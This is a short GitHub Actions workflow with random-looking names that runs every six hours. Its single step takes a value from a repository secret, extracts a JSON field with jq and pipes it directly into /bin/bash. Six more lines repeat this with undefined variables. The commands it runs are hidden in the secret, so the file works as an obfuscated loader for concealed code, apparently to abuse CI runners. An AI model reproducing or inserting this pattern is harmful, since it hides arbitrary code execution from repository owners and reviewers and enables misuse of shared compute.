name: flowerywhizz

on:
  workflow_dispatch:
  schedule:
    - cron: '56 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: flowerywhizz
        env:
          r226: ${{ secrets.r226 }}
        run: |
          echo $r226 | jq -r .tnv45 | /bin/bash
          echo $ioi69748 | jq -r .tb71 | /bin/bash
          echo $k461 | jq -r .tcq282 | /bin/bash
          echo $l045 | jq -r .mceg684 | /bin/bash
          echo $ufdh17762 | jq -r .sm6602 | /bin/bash
          echo $xch4787 | jq -r .atdh0773 | /bin/bash
          echo $kaxna9128 | jq -r .ww73765 | /bin/bash

